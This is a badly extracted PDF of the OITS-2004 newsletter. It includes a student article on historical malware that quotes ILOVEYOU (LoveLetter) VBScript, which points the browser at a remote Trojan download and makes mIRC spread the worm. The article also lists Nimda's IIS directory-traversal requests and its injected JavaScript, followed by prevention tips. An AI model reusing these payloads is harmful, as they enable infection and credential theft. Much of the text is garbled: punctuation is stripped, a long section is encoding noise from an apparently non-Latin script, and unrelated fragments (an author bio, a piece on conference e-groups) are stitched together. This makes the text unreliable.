num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 31: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

